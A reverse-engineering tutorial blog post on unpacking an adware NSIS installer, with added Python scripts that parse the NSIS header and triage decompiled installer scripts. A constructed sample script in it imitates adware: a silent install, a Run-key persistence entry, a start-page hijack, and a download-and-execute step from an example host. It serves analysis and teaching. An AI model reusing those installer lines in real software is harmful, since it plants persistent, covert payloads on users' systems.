By ro0ted | March 17, 2015 - 18:00 | Posted in /b/ | 12 Comments
#ro0ted #OpNewblood What the blackhats don’t want you to know: Dissecting Adware

More adware.

The target:

[screenshot]

Load it in Exeinfo PE:

[screenshot]

Nullsoft (NSIS) installers are the easy case. Notice that it reports the file as crypted; that is only the installer's compressed payload, not a real protector on the stub:

[screenshot]

For kicks, run the crypto scanner as well. My guess is CRC32, since NSIS installers carry a CRC32 of the package by default (CRCCheck is on unless the author switched it off):

[screenshot]

[screenshot]

[screenshot]
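Exeinfo PE recognizes the stub by a signature you can find yourself. The following is an added example (my code, not from the post): a scanner for the NSIS firstheader, the 28-byte record every NSIS installer carries right after its PE stub, plus the two cheap integrity checks that record allows. The header layout follows the `firstheader` struct in NSIS `Source/exehead/fileform.h`; the CRC layout (a little-endian CRC32 of every byte before the final four) is my reading of the exehead loader and is marked as an assumption in the code, so treat a mismatch on a real sample as a reason to look closer rather than proof of tampering. The installer image it runs on is constructed inline and is not the adware from the post.

```python
"""Locate and decode the NSIS firstheader in an installer and check its trailing CRC32.

Added example for this post, not the author's code.  Header layout is the
`firstheader` struct from NSIS Source/exehead/fileform.h.  The sample image is
constructed in build_sample(); it is not the adware from the post.
"""
import struct
import zlib
from typing import Optional

# siginfo (0xDEADBEEF, little-endian) immediately followed by the 12-byte magic.
NSIS_SIG = b"\xef\xbe\xad\xde" + b"NullsoftInst"

# Bits of firstheader.flags (fileform.h).
FH_FLAGS_UNINSTALL = 1
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4
FH_FLAGS_FORCE_CRC = 8

# flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data: 7 x u32
FIRSTHEADER_SIZE = 28


def is_nsis(image: bytes) -> bool:
    """Cheap yes/no: the magic must be present with room for the flags word in front of it."""
    return image.find(NSIS_SIG) >= 4


def find_firstheader(image: bytes) -> dict:
    """Find the firstheader and decode it.  Raises ValueError if it is absent or cut short."""
    pos = image.find(NSIS_SIG)
    if pos < 4:  # -1 (not found) or no room for the flags word
        raise ValueError("no NSIS firstheader: not NSIS, or wrapped by something else")
    start = pos - 4
    if len(image) < start + FIRSTHEADER_SIZE:
        raise ValueError("truncated firstheader")
    flags, _sig, _n0, _n1, _n2, hdr_len, data_len = struct.unpack_from("<7I", image, start)
    return {
        "offset": start,
        "flags": flags,
        "uninstaller": bool(flags & FH_FLAGS_UNINSTALL),
        "silent": bool(flags & FH_FLAGS_SILENT),
        "no_crc": bool(flags & FH_FLAGS_NO_CRC),
        "force_crc": bool(flags & FH_FLAGS_FORCE_CRC),
        "length_of_header": hdr_len,
        # Counted from the start of the firstheader to the end of the installer
        # (CRC included), so this is where the file should end.
        "expected_end": start + data_len,
        "datablock_offset": start + FIRSTHEADER_SIZE,
    }


def check_trailing_crc32(image: bytes, hdr: dict) -> Optional[bool]:
    """True/False for the trailing CRC, None when the header says there is none.

    ASSUMPTION: with CRCCheck on, NSIS appends a little-endian CRC32 of every
    preceding byte as the last four bytes of the file.  On a real sample, a
    mismatch can also mean a truncated download or an appended overlay.
    """
    if hdr["no_crc"]:
        return None
    stored = struct.unpack("<I", image[-4:])[0]
    return (zlib.crc32(image[:-4]) & 0xFFFFFFFF) == stored


def triage(image: bytes) -> dict:
    """One-call summary: header fields plus the length and CRC checks."""
    hdr = find_firstheader(image)
    hdr["length_ok"] = hdr["expected_end"] == len(image)
    hdr["crc_ok"] = check_trailing_crc32(image, hdr)
    return hdr


def build_sample(with_crc: bool = True, tamper: bool = False) -> bytes:
    """Constructed stand-in for an installer: a fake 512-byte PE stub, a firstheader,
    opaque bytes standing in for the compressed datablock, and an optional CRC."""
    stub = b"MZ" + b"\x00" * 510
    datablock = bytes(range(64))  # not real LZMA/zlib data, just payload bytes
    flags = 0 if with_crc else FH_FLAGS_NO_CRC
    data_len = FIRSTHEADER_SIZE + len(datablock) + (4 if with_crc else 0)
    first = struct.pack("<II", flags, 0xDEADBEEF) + b"NullsoftInst" + struct.pack("<II", 32, data_len)
    image = bytearray(stub + first + datablock)
    if with_crc:
        image += struct.pack("<I", zlib.crc32(bytes(image)) & 0xFFFFFFFF)
    if tamper:
        image[len(stub) + FIRSTHEADER_SIZE] ^= 0xFF  # flip one datablock byte after the CRC was sealed
    return bytes(image)


if __name__ == "__main__":
    for label, img in (("clean", build_sample()), ("tampered", build_sample(tamper=True)),
                       ("no-crc", build_sample(with_crc=False))):
        info = triage(img)
        print(f"{label}: header at {info['offset']:#x}, silent={info['silent']}, "
              f"length_ok={info['length_ok']}, crc_ok={info['crc_ok']}")
```

Run it against a real sample by reading the file into `image` and calling `triage(image)`; an installer that fails `length_ok` has data appended or chopped after the NSIS package, which is worth a look on its own.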

We don’t need to do anything complicated. Just open it in 7-Zip:

[screenshot]

and 7-Zip lists every resource that was packed into the installer, in the extracted folder:

[screenshot]

You can then load the extracted DLLs one at a time in OllyDbg or IDA Pro if you want to.

In OllyDbg, go to Plugins and select Load DLL:

[screenshot]

[screenshot]

IDA Pro:

[screenshot]

I found this interesting file in the directory list:

[screenshot]

Oops.
Let’s reverse the stub. Just open it in Notepad++:

[screenshot]

[screenshot]

You can read the Nullsoft stub source here:

https://cyberguerrilla.org/paste/?c5a5b4df6f76e9ef#FGYLE2fQsC2wyoFOe1aMOR05RvJbkunArSUkwzNzqZ8=
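When 7-Zip (the 9.20-era builds most people used for this) opens an NSIS installer it also reconstructs the installer script as `[NSIS].nsi`, and that script is the fastest read on what an adware bundler actually does. Here is an added example (my code, not the author's, and not the file in the post's screenshots) that triages such a script: it pulls out what gets executed, downloaded, written to the registry (Run keys in particular), dropped and cleaned up, plus every URL, and turns the hits into the one-line findings you would put in a report. The `.nsi` text is constructed for the example with reserved `.example` domains, and the category regexes are mine.

```python
"""Triage a decompiled NSIS script ([NSIS].nsi as written by 7-Zip).

Added example for this post, not the author's code.  SAMPLE_NSI is a
constructed script that imitates a typical adware bundler; it is not the
file from the post's screenshots.
"""
import re
from collections import defaultdict

# What to pull out of the script, by category.  A line may land in several.
INTEREST = {
    "executes": re.compile(r"^\s*(Exec(?:Wait|Shell)?|nsExec::\w+)\b"),
    "downloads": re.compile(r"^\s*(inetc::\w+|NSISdl::download)\b", re.I),
    "persistence": re.compile(r'^\s*WriteReg\w+\s+HK\w+\s+"[^"]*\\CurrentVersion\\Run', re.I),
    "registry": re.compile(r"^\s*(WriteReg\w+|DeleteReg\w+)\b"),
    "drops": re.compile(r"^\s*(File|SetOutPath|CreateShortCut)\b"),
    "cleanup": re.compile(r"^\s*(Delete|RMDir)\b"),
    "plugins": re.compile(r"^\s*\w+::\w+"),
    "stealth": re.compile(r"^\s*(SilentInstall\s+silent|RequestExecutionLevel\s+admin)\b", re.I),
}
URL_RE = re.compile(r"""https?://[^\s"']+""")

# Constructed sample script; the domains are RFC 2606 reserved names.
SAMPLE_NSI = r"""
; constructed sample, not the file from the post
Name "Video Downloader Plus"
OutFile "setup.exe"
InstallDir "$PROGRAMFILES\VideoDownloaderPlus"
RequestExecutionLevel admin
SilentInstall silent

Section
  SetOutPath $INSTDIR
  File helper.dll
  File svc.exe
  WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Run" "VDPUpdater" "$INSTDIR\svc.exe /tray"
  WriteRegStr HKCU "Software\Microsoft\Internet Explorer\Main" "Start Page" "http://search.example/?aff=2231"
  inetc::get "http://cdn.example/offer/bundle.exe" "$TEMP\bundle.exe" /END
  ExecWait "$TEMP\bundle.exe /S"
  ExecShell open "http://offers.example/thanks?aff=2231"
  CreateShortCut "$DESKTOP\Video Downloader Plus.lnk" "$INSTDIR\svc.exe"
  Delete "$TEMP\bundle.exe"
SectionEnd
"""


def triage_nsi(script: str) -> dict:
    """Return {category: [(line_no, text), ...]} for every interesting line."""
    hits = defaultdict(list)
    for no, line in enumerate(script.splitlines(), 1):
        text = line.strip()
        if not text or text.startswith(";"):
            continue
        for cat, rx in INTEREST.items():
            if rx.search(line):
                hits[cat].append((no, text))
        for url in URL_RE.findall(line):
            hits["urls"].append((no, url))
    return dict(hits)


def red_flags(hits: dict) -> list:
    """Turn the raw hits into the short findings you would put in a report."""
    flags = []
    if hits.get("downloads") and hits.get("executes"):
        flags.append("fetches a payload at install time and runs it (bundler behaviour)")
    if hits.get("persistence"):
        flags.append("adds a Run key, so the dropped binary survives reboot")
    if hits.get("stealth"):
        flags.append("silent and/or elevated install, the user sees no dialog")
    if any("Internet Explorer" in text for _, text in hits.get("registry", [])):
        flags.append("rewrites browser settings (search/start page hijack)")
    return flags


if __name__ == "__main__":
    result = triage_nsi(SAMPLE_NSI)
    for cat, lines in result.items():
        print(f"[{cat}]")
        for no, text in lines:
            print(f"  {no:3}: {text}")
    print("findings:")
    for f in red_flags(result):
        print("  -", f)
```

On a real extraction, replace `SAMPLE_NSI` with the contents of the `[NSIS].nsi` that 7-Zip wrote next to the unpacked files; the URLs and the Run-key line are usually all the indicators you need before touching a debugger.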

And that, my friends, is how you rip apart adware in a jiffy. – https://twitter.com/ro0ted/

ro0ted

Check out my other tutorials in my series, “What the Blackhats don’t want you to know”

(In order)

Why am I teaching Reverse Engineering to inexperienced new Anons in OpNewblood?

Whitehat Lab

ASM Programming

Introduction Part 1 Ollydbg 

Introduction Part 2 Using Ollydbg and Tracing Botnets

Analyzing Botnets

Introduction Part 3 Ollydbg: Cheating a Crackme

Introduction Part 4 Ollydbg: Your first Patch

Encryption 101

Cuckoo Sandbox: Automated Malware Analysis also known as Malwr.com

Introduction to Honeydrive: A Brief Walk Through

Installing Kippo the SSH Honeypot on a VPS Part 1: How to set it up

Resource Hacker

Dll Injection the Easy Way

Visual Basic Binaries Walk Through Part 1

Ollydbg on Steroids

Creating Patchers Part 1

Have you supported the gas mask campaign over the years?

Crack to win a gas mask gift pack

How to edit a register me crack me Pre Part 1

Unwinding Delphi Binaries Walk Through if not Preview

Cracking Delphi Part 2

Reversing Timed Trials: Ollydbg Tricks Part 3

Analyzing Adware

Preview Against Debugging

Bypassing Registering 101

Bypassing Part 2

Android/iOS Reversing

Introducing IDA Pro: Static Analyzing

Hacker’s Disassembler

Ripping Apart Adware +
